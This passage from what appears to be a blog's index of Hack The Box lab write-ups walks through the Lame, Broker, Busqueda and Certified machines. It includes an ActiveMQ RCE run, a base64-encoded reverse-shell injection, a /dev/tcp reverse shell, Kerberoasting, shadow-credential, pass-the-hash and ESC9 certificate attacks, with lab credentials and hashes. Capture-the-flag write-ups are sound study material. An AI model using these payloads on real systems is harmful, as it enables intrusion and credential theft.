'10.10.10.3'\nconn = SMBConnection(userID, password, \"HELLO\", \"TEST\", use_ntlm_v2=False)\nconn.connect(victim_ip, 445)\n------------------------------------------ $ python3 exploit.py ------------------------------------------ $ nc -lnvp 1337 Listening on 0.0.0.0 1337 Connection received on 10.10.10.3 48005 whoami root cat /root/root.txt 03ce.....b6ed\nuser flag - makis\nroot@lame:/home# cd /home/makis/ root@lame:/home/makis# ls user.txt root@lame:/home/makis# cat user.txt d336.....2192 root@lame:/home/makis# ","date":"2024-12-17T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/lame-htb/","title":"HTB | Lame"},{"content":" Machine name: Broker, OS: Linux, IP: 10.10.11.243, Difficulty: Easy\nEnumeration\nnmap\nnmap -sC -sV -An -p- 10.10.11.243 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) | http-auth: | HTTP/1.1 401 Unauthorized\\x0D |_ basic realm=ActiveMQRealm |_http-title: Error 401 Unauthorized 1883/tcp open mqtt | mqtt-subscribe: | Topics and their most recent payloads: | ActiveMQ/Advisory/Consumer/Topic/#: |_ ActiveMQ/Advisory/MasterBroker: 5672/tcp open amqp? 
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65 | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: | AMQP | AMQP | amqp:decode-error |_ 7Connection from client using unsupported AMQP attempted 8161/tcp open http Jetty 9.4.39.v20210325 |_http-title: Error 401 Unauthorized |_http-server-header: Jetty(9.4.39.v20210325) | http-auth: | HTTP/1.1 401 Unauthorized\\x0D |_ basic realm=ActiveMQRealm 44151/tcp open tcpwrapped 61613/tcp open stomp Apache ActiveMQ | fingerprint-strings: | HELP4STOMP: | ERROR | content-type:text/plain | message:Unknown STOMP action: HELP | org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP | org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258) | org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85) | org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83) | org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233) | org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215) |_ java.lang.Thread.run(Thread.java:750) 61614/tcp open http Jetty 9.4.39.v20210325 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Site doesn't have a title. 
|_http-server-header: Jetty(9.4.39.v20210325) 61616/tcp open apachemq ActiveMQ OpenWire transport | fingerprint-strings: | NULL: | ActiveMQ | TcpNoDelayEnabled | SizePrefixDisabled | CacheSize | ProviderName | ActiveMQ | StackTraceEnabled | PlatformDetails | Java | CacheEnabled | TightEncodingEnabled | MaxFrameSize | MaxInactivityDuration | MaxInactivityDurationInitalDelay | ProviderVersion |_ 5.15.15\nFoothold\nApache ActiveMQ Server (CVE-2023-46604)\nWe use the login admin/admin to connect. On the main page we notice the version number: Apache ActiveMQ 5.15.15\nAfter a quick search on the internet we soon find a CVE along with a GitHub repo that exploits it: https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ?tab=readme-ov-file\n./exploit -i 10.10.11.243 -u http://10.10.16.10:8001/poc-linux.xml [*] Target: 10.10.11.243:61616 [*] XML URL: http://10.10.16.10:8001/poc-linux.xml [*] Sending packet: 000000781f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010025687474703a2f2f31302e31302e31362e31303a383030312f706f632d6c696e75782e786d6c ------------------------------------------------------------------------------ python3 -m http.server 8001 Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ... 
10.10.11.243 - - [12/Dec/2024 00:19:59] \"GET /poc-linux.xml HTTP/1.1\" 200 - 10.10.11.243 - - [12/Dec/2024 00:19:59] \"GET /poc-linux.xml HTTP/1.1\" 200 - 10.10.11.243 - - [12/Dec/2024 00:19:59] \"GET /test.elf HTTP/1.1\" 200 - 10.10.11.243 - - [12/Dec/2024 00:20:15] \"GET /poc-linux.xml HTTP/1.1\" 200 - 10.10.11.243 - - [12/Dec/2024 00:20:15] \"GET /poc-linux.xml HTTP/1.1\" 200 - 10.10.11.243 - - [12/Dec/2024 00:20:15] \"GET /test.elf HTTP/1.1\" 200 - ------------------------------------------------------------------------------ $ nc -lnvp 8888 ... activemq@broker:/opt/apache-activemq-5.15.15/bin$ cat ~/user.tdxt cat: /home/activemq/user.tdxt: No such file or directory activemq@broker:/opt/apache-activemq-5.15.15/bin$ cat ~/user.txt 9e54.....9a86 activemq@broker:/opt/apache-activemq-5.15.15/bin$\nPrivilege Escalation\nnginx as root\nRunning sudo -l, we see that we can run the nginx command as root. With this command we can start a second nginx server on another port, passing it a new configuration file. The method therefore consists of changing the user in the configuration file so that file access happens as root.\nIf we connect over HTTP to the server's IP on the port defined in the configuration, we will be able to open every file on the machine, in particular the root.txt file containing the flag.\n...................... 
","date":"2024-12-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/broker-htb/","title":"HTB | Broker"},{"content":" Machine name: Busqueda, OS: Linux, IP: 10.10.11.208, Difficulty: Easy\nEnumeration\nnmap\nnmap -sC -sV -An -p- 10.10.11.208 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://searcher.htb/\nFoothold\nPython Command injection\n## exploit\n',__import__('os').system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTAvOTAwMSAwPiYx | base64 -d | bash -i')) # junky comment\n$ nc -lnvp 9001 svc@busqueda:~$ cat user.txt afb3.....29e5\nGitea : svc password\nWe can see that the application has a .git directory and is therefore a git repo. We retrieve the link to the gitea.searcher.htb server. In the .git config file we find credentials for the newly discovered website running on port 3000\nsvc@busqueda:/var/www/app$ git log commit 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 (HEAD -> main, origin/main) Author: administrator <administrator@gitea.searcher.htb> # <---------------- \"gitea.searcher.htb\" Date: Sun Dec 25 12:14:21 2022 +0000 Initial commit svc@busqueda:/var/www/app/$ cd .git ## credentials svc@busqueda:/var/www/app/.git$ cat config [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote \"origin\"] url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git fetch = +refs/heads/*:refs/remotes/origin/* [branch \"main\"] remote = origin merge = refs/heads/main\nIn truth, I found the creds like this:\ngrep -rni \"gitea\" 
app/.git/logs/HEAD:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000\tcommit (initial): Initial commit app/.git/logs/refs/heads/main:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000\tcommit (initial): Initial commit app/.git/logs/refs/remotes/origin/main:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000\tupdate by push ## HERE app/.git/config:7:\turl = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git\nUser: cody:jh1usoih2bkjaspwe92\nWe try to connect over SSH as cody, then as svc with cody's password, and it works!\nssh svc@10.10.11.208\nRoot Privilege Escalation\n$ sudo -l Matching Defaults entries for svc on busqueda: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty User svc may run the following commands on busqueda: (root) /usr/bin/python3 /opt/scripts/system-checkup.py *\nWe can see that when we run system-checkup we can list the docker containers and send it commands to get more information\nsvc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py aaaa Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2) docker-ps : List running docker containers docker-inspect : Inpect a certain docker container full-checkup : Run a full system checkup svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 960873171e2e gitea/gitea:latest \"/usr/bin/entrypoint…\" 23 months ago Up 7 hours 
127.0.0.1:3000-\u0026gt;3000/tcp, 127.0.0.1:222-\u0026gt;22/tcp gitea f84a6b33fb5a mysql:8 \u0026#34;docker-entrypoint.s…\u0026#34; 23 months ago Up 7 hours 127.0.0.1:3306-\u0026gt;3306/tcp, 33060/tcp mysql_db $ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect \u0026#39;{{json .Config.Env}}\u0026#39; mysql_db [\u0026#34;MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF\u0026#34;,\u0026#34;MYSQL_USER=gitea\u0026#34;,\u0026#34;MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh\u0026#34;,\u0026#34;MYSQL_DATABASE=gitea\u0026#34;,\u0026#34;PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\u0026#34;,\u0026#34;GOSU_VERSION=1.14\u0026#34;,\u0026#34;MYSQL_MAJOR=8.0\u0026#34;,\u0026#34;MYSQL_VERSION=8.0.31-1.el8\u0026#34;,\u0026#34;MYSQL_SHELL_VERSION=8.0.31-1.el8\u0026#34;] We find the root password in the environment variables of the mysql docker container.\nThis password can be used for the administrator account on the website gitea.searcher.htb!\nThere we can see a new git repository with the complete code of the famous system-checkup.py script\nsvc@busqueda:~$ vim full-checkup.sh #!/bin/bash cat /root/root.txt svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup 52e6.....04a7 [+] Done ! 
We can also use a reverse shell with this code for full-checkup.sh:\n#!/bin/bash sh -i \u0026gt;\u0026amp; /dev/tcp/10.10.16.10/9001 0\u0026gt;\u0026amp;1 ","date":"2024-12-11T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/busqueda-htb/","title":"HTB | Busqueda"},{"content":" Machine name OS IP Difficulty Certified Windows 10.10.11.41 Medium Users User : judith.mader, Password : judith09 User : management_svc, NT hash : a091c1832bcdd4677c28b5a6a1295584 User : ca_operator, NT hash : 94994b74f29662fc4d702f2f3b0df327 User : Administrator, LM/NT hash : aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 Enumeration nmap nmap 10.10.11.41 -Pn Starting Nmap 7.80 ( https://nmap.org ) at 2024-12-08 14:07 CET Nmap scan report for 10.10.11.41 Host is up (0.060s latency). Not shown: 992 filtered ports PORT STATE SERVICE 53/tcp open domain 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 636/tcp open ldapssl 3269/tcp open globalcatLDAPssl Enumerating Users - smb nxc smb 10.10.11.41 -u \u0026#39;judith.mader\u0026#39; -p \u0026#39;judith09\u0026#39; -d \u0026#39;certified.htb\u0026#39; --rid-brute SMB 10.10.11.41 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) SMB 10.10.11.41 445 DC01 [+] certified.htb\\judith.mader:judith09 SMB 10.10.11.41 445 DC01 498: CERTIFIED\\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 500: CERTIFIED\\Administrator (SidTypeUser) SMB 10.10.11.41 445 DC01 501: CERTIFIED\\Guest (SidTypeUser) SMB 10.10.11.41 445 DC01 502: CERTIFIED\\krbtgt (SidTypeUser) SMB 10.10.11.41 445 DC01 512: CERTIFIED\\Domain Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 513: CERTIFIED\\Domain Users (SidTypeGroup) SMB 10.10.11.41 445 DC01 514: 
CERTIFIED\\Domain Guests (SidTypeGroup) SMB 10.10.11.41 445 DC01 515: CERTIFIED\\Domain Computers (SidTypeGroup) SMB 10.10.11.41 445 DC01 516: CERTIFIED\\Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 517: CERTIFIED\\Cert Publishers (SidTypeAlias) SMB 10.10.11.41 445 DC01 518: CERTIFIED\\Schema Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 519: CERTIFIED\\Enterprise Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 520: CERTIFIED\\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.41 445 DC01 521: CERTIFIED\\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 522: CERTIFIED\\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 525: CERTIFIED\\Protected Users (SidTypeGroup) SMB 10.10.11.41 445 DC01 526: CERTIFIED\\Key Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 527: CERTIFIED\\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 553: CERTIFIED\\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.41 445 DC01 571: CERTIFIED\\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.41 445 DC01 572: CERTIFIED\\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.41 445 DC01 1000: CERTIFIED\\DC01$ (SidTypeUser) SMB 10.10.11.41 445 DC01 1101: CERTIFIED\\DnsAdmins (SidTypeAlias) SMB 10.10.11.41 445 DC01 1102: CERTIFIED\\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.41 445 DC01 1103: CERTIFIED\\judith.mader (SidTypeUser) SMB 10.10.11.41 445 DC01 1104: CERTIFIED\\Management (SidTypeGroup) SMB 10.10.11.41 445 DC01 1105: CERTIFIED\\management_svc (SidTypeUser) SMB 10.10.11.41 445 DC01 1106: CERTIFIED\\ca_operator (SidTypeUser) SMB 10.10.11.41 445 DC01 1601: CERTIFIED\\alexander.huges (SidTypeUser) SMB 10.10.11.41 445 DC01 1602: CERTIFIED\\harry.wilson (SidTypeUser) SMB 10.10.11.41 445 DC01 1603: CERTIFIED\\gregory.cameron (SidTypeUser) Bloodhound-python We run bloodhound-python to collect data about the Active Directory.\nsudo 
bloodhound-python -d CERTIFIED.HTB -u \u0026#39;judith.mader\u0026#39; -p \u0026#39;judith09\u0026#39; -dc certified.htb -c All --zip -ns 10.10.11.41 INFO: Found AD domain: certified.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) INFO: Connecting to LDAP server: certified.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: certified.htb INFO: Found 10 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: INFO: Querying computer: DC01.certified.htb INFO: Done in 00M 07S INFO: Compressing output into 20241208115439_bloodhound.zip Foothold Targeted Kerberoasting From what we observe in bloodhound, the user management_svc could potentially be recovered with a \u0026ldquo;targeted Kerberoasting\u0026rdquo; attack. Using the targetedKerberoast.py tool, we carry out the attack and retrieve the password hash of management_svc:\ntargetedKerberoast.py -d certified.htb -u judith.mader -p judith09 -v [*] Starting kerberoast attacks [*] Fetching usernames from Active Directory with LDAP [+] Printing hash for (management_svc) $krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$98e6a7443e6760f44cdd6b7a9ff0cdc8$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 Shadow credential attack Grant ownership : It has the following command-line arguments. This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object. The attacker can update the owner of the target object. 
Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. So we make judith.mader the owner of the group python3 owneredit.py -new-owner \u0026#39;judith.mader\u0026#39; -target \u0026#39;management\u0026#39; -dc-ip 10.10.11.41 -action write \u0026#39;certified.htb\u0026#39;/\u0026#39;judith.mader\u0026#39;:\u0026#39;judith09\u0026#39; [*] Current owner information below [*] - SID: S-1-5-21-729746778-2675978091-3820388244-512 [*] - sAMAccountName: Domain Admins [*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb [*] OwnerSid modified successfully! Then:\nModifying the rights To abuse ownership of a group object, you may grant yourself the AddMember privilege. dacledit.py -action \u0026#39;write\u0026#39; -rights \u0026#39;WriteMembers\u0026#39; -principal \u0026#39;judith.mader\u0026#39; -target \u0026#39;management\u0026#39; \u0026#39;certified.htb\u0026#39;/\u0026#39;judith.mader\u0026#39;:\u0026#39;judith09\u0026#39; [*] DACL backed up to dacledit-20241209-130331.bak [*] DACL modified successfully! ## However, after checking, this did not work. On the other hand I was able to give myself full control with this command dacledit.py -action \u0026#39;write\u0026#39; -rights \u0026#39;FullControl\u0026#39; -principal \u0026#39;judith.mader\u0026#39; -target \u0026#39;management\u0026#39; \u0026#39;certified.htb\u0026#39;/\u0026#39;judith.mader\u0026#39;:\u0026#39;judith09\u0026#39; ## To check the rights of users on a group/object, this command can be used dacledit.py -action \u0026#39;read\u0026#39; -target \u0026#39;management\u0026#39; \u0026#39;certified.htb\u0026#39;/\u0026#39;judith.mader\u0026#39;:\u0026#39;judith09\u0026#39; | grep judith -A 3 -B 3 Finally:\nAdding to the group You can now add members to the group. 
So we add ourselves, judith.mader, as a member of the group. net rpc group addmem \u0026#34;management\u0026#34; \u0026#34;judith.mader\u0026#34; -U \u0026#34;certified.htb\u0026#34;/\u0026#34;judith.mader\u0026#34;%\u0026#34;judith09\u0026#34; -S \u0026#34;certified.htb\u0026#34; Now that judith.mader is a member of the group, we can finally carry out a \u0026lsquo;shadow credential attack\u0026rsquo; to obtain the NT hash of management_svc:\ncertipy-ad shadow auto -username judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41 -account management_svc -debug [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.41:636 - ssl [+] Default path: DC=certified,DC=htb [+] Configuration path: CN=Configuration,DC=certified,DC=htb [*] Targeting user \u0026#39;management_svc\u0026#39; [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID \u0026#39;8438746f-c951-b3d9-9be0-c455cedf6731\u0026#39; \u0026lt;KeyCredential structure at 0x7f711d6a6900\u0026gt; | Owner: CN=management service,CN=Users,DC=certified,DC=htb | Version: 0x200 | KeyID: KcbU1P0bMaVuWjpricPI4cNFK5+qjRkV4gYbM4DfPP0= | KeyHash: 64a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d | RawKeyMaterial: \u0026lt;dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f711d6a68a0\u0026gt; | | Exponent (E): 65537 | | Modulus (N): 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 | | Prime1 (P): 0x0 | | Prime2 (Q): 0x0 | Usage: KeyUsage.NGC | LegacyUsage: None | Source: KeySource.AD | DeviceId: 8438746f-c951-b3d9-9be0-c455cedf6731 | CustomKeyInfo: \u0026lt;CustomKeyInformation at 0x7f711d6968f0\u0026gt; | | Version: 1 | | Flags: KeyFlags.NONE | | VolumeType: None | | SupportsNotification: None | | FekKeyVersion: None | | Strength: None | | Reserved: 
None | | EncodedExtendedCKI: None | LastLogonTime (UTC): 2024-12-10 04:23:52.735565 | CreationTime (UTC): 2024-12-10 04:23:52.735565 [+] Key Credential: B:828:0002000020000129c6d4d4fd1b31a56e5a3a6b89c3c8e1c3452b9faa8d1915e2061b3380df3cfd20000264a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d1b0103525341310008000003000000000100000000000000000000010001920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e6901000401010005001000066f74388451c9d9b39be0c455cedf67310200070100080008fb78af51bb4adb01080009fb78af51bb4adb01:CN=management service,CN=Users,DC=certified,DC=htb [*] Adding Key Credential with device ID \u0026#39;8438746f-c951-b3d9-9be0-c455cedf6731\u0026#39; to the Key Credentials for \u0026#39;management_svc\u0026#39; [*] Successfully added Key Credential with device ID \u0026#39;8438746f-c951-b3d9-9be0-c455cedf6731\u0026#39; to the Key Credentials for \u0026#39;management_svc\u0026#39; [*] Authenticating as \u0026#39;management_svc\u0026#39; with the certificate [*] Using principal: management_svc@certified.htb [*] Trying to get TGT... 
[*] Got TGT [*] Saved credential cache to \u0026#39;management_svc.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;management_svc\u0026#39; [*] Restoring the old Key Credentials for \u0026#39;management_svc\u0026#39; [*] Successfully restored the old Key Credentials for \u0026#39;management_svc\u0026#39; [*] NT hash for \u0026#39;management_svc\u0026#39;: a091c1832bcdd4677c28b5a6a1295584 We obtain the NT hash for the user management_svc!\nWinRM connection with the NT hash (Pass-The-Hash) - user flag evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\management_svc\\Documents\u0026gt; cd ../Desktop *Evil-WinRM* PS C:\\Users\\management_svc\\Desktop\u0026gt; cat user.txt 423f.....d084 Shadow Credentials attack : management_svc -\u0026gt; ca_operator We perform a shadow credential attack again to retrieve the NT hash of the user ca_operator. For this we use the user management_svc with its NT hash (the -hashes option instead of -p for the password, which we do not know):\ncertipy-ad shadow auto -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41 -account ca_operator -debug [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.41:636 - ssl [+] Default path: DC=certified,DC=htb [+] Configuration path: CN=Configuration,DC=certified,DC=htb [*] Targeting user \u0026#39;ca_operator\u0026#39; ... ... 
[*] Successfully restored the old Key Credentials for \u0026#39;ca_operator\u0026#39; [*] NT hash for \u0026#39;ca_operator\u0026#39;: 13b29964cc2480b4ef454c59562e675c ### New bloodhound run with the user ca_operator\nsudo bloodhound-python -d CERTIFIED.HTB -u \u0026#39;ca_operator\u0026#39; -p \u0026#39;P@ssword\u0026#39; -dc certified.htb -c All --zip -ns 10.10.11.41 Hashcat bruteforce of the NT hash We obtain the password of the user ca_operator thanks to hashcat and the rockyou.txt wordlist:\nhashcat -m 1000 -a 0 hash.txt ~/wordlists/rockyou.txt --show 13b29964cc2480b4ef454c59562e675c:P@ssword Privilege Escalation Bloodhound PE Path Checking vuln in certificates / templates with ca_operator We observe that management_svc has the CanPSRemote right on the DC01 machine:\ncertipy-ad find -vulnerable -stdout -u ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327:94994b74f29662fc4d702f2f3b0df327 -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve \u0026#39;CERTIFIED.HTB\u0026#39; at \u0026#39;10.0.2.3\u0026#39; [+] Resolved \u0026#39;CERTIFIED.HTB\u0026#39; from cache: 10.10.11.41 [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.41:636 - ssl [+] Default path: DC=certified,DC=htb [+] Configuration path: CN=Configuration,DC=certified,DC=htb [+] Adding Domain Computers to list of current user\u0026#39;s SIDs [+] List of current user\u0026#39;s SIDs: CERTIFIED.HTB\\Domain Users (S-1-5-21-729746778-2675978091-3820388244-513) CERTIFIED.HTB\\Authenticated Users (CERTIFIED.HTB-S-1-5-11) CERTIFIED.HTB\\Domain Computers (S-1-5-21-729746778-2675978091-3820388244-515) CERTIFIED.HTB\\Everyone (CERTIFIED.HTB-S-1-1-0) CERTIFIED.HTB\\operator ca 
(S-1-5-21-729746778-2675978091-3820388244-1106) CERTIFIED.HTB\\Users (CERTIFIED.HTB-S-1-5-32-545) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [+] Trying to resolve \u0026#39;DC01.certified.htb\u0026#39; at \u0026#39;10.0.2.3\u0026#39; [!] Failed to resolve: DC01.certified.htb [*] Trying to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; via CSRA [+] Trying to get DCOM connection for: DC01.certified.htb [!] Got error while trying to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; via CSRA: [Errno -2] Name or service not known [*] Trying to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; via RRP [!] Got error while trying to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; via RRP: [Errno Connection error (DC01.certified.htb:445)] [Errno -2] Name or service not known [!] Failed to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; [+] Trying to resolve \u0026#39;DC01.certified.htb\u0026#39; at \u0026#39;10.0.2.3\u0026#39; [!] Failed to resolve: DC01.certified.htb [+] Connecting to DC01.certified.htb:80 [!] 
Got error while trying to check for web enrollment: [Errno -2] Name or service not known [*] Enumeration output: Certificate Authorities 0 CA Name : certified-DC01-CA DNS Name : DC01.certified.htb Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D Certificate Validity Start : 2024-05-13 15:33:41+00:00 Certificate Validity End : 2124-05-13 15:43:41+00:00 Web Enrollment : Disabled User Specified SAN : Unknown Request Disposition : Unknown Enforce Encryption for Requests : Unknown Certificate Templates 0 Template Name : CertifiedAuthentication Display Name : Certified Authentication Certificate Authorities : certified-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectRequireDirectoryPath SubjectAltRequireUpn Enrollment Flag : NoSecurityExtension AutoEnrollment PublishToDs Private Key Flag : 16842752 Extended Key Usage : Server Authentication Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1000 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : CERTIFIED.HTB\\operator ca CERTIFIED.HTB\\Domain Admins CERTIFIED.HTB\\Enterprise Admins Object Control Permissions Owner : CERTIFIED.HTB\\Administrator Write Owner Principals : CERTIFIED.HTB\\Domain Admins CERTIFIED.HTB\\Enterprise Admins CERTIFIED.HTB\\Administrator Write Dacl Principals : CERTIFIED.HTB\\Domain Admins CERTIFIED.HTB\\Enterprise Admins CERTIFIED.HTB\\Administrator Write Property Principals : CERTIFIED.HTB\\Domain Admins CERTIFIED.HTB\\Enterprise Admins CERTIFIED.HTB\\Administrator [!] 
Vulnerabilities ESC9 : \u0026#39;CERTIFIED.HTB\\\\operator ca\u0026#39; can enroll and template has no security extension Exploit ESC9 vulnerability #### Modifying the userPrincipalName (UPN) attribute of ca_operator management_svc modifies the UPN of ca_operator (its user principal name) so that it matches Administrator (without the @corp.local domain). The modified UPN remains valid because it does not exactly match that of Administrator (which is Administrator@corp.local).\ncertipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user \u0026#39;ca_operator\u0026#39;: userPrincipalName : Administrator [*] Successfully updated \u0026#39;ca_operator\u0026#39; Requesting Certificate management_svc requests a certificate while posing as ca_operator, but with the UPN changed to Administrator. The (misconfigured) ESC9 certificate template allows a certificate to be issued without including additional security (for example, extensions that prevent abuse). 
certipy-ad req -username ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327 -ca certified-DC01-CA -template CertifiedAuthentication /usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence \u0026#39;\\(\u0026#39; \u0026#34;(0x[a-zA-Z0-9]+) \\([-]?[0-9]+ \u0026#34;, [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 23 [*] Got certificate with UPN \u0026#39;Administrator\u0026#39; [*] Certificate has no object SID [*] Saved certificate and private key to \u0026#39;administrator.pfx\u0026#39; Restoring the UPN of ca_operator certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user \u0026#39;ca_operator\u0026#39; -upn \u0026#39;ca_operator@certified.htb\u0026#39; -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve \u0026#39;CERTIFIED.HTB\u0026#39; at \u0026#39;10.0.2.3\u0026#39; [+] Resolved \u0026#39;CERTIFIED.HTB\u0026#39; from cache: 10.10.11.41 [+] Authenticating to LDAP server [+] Bound to 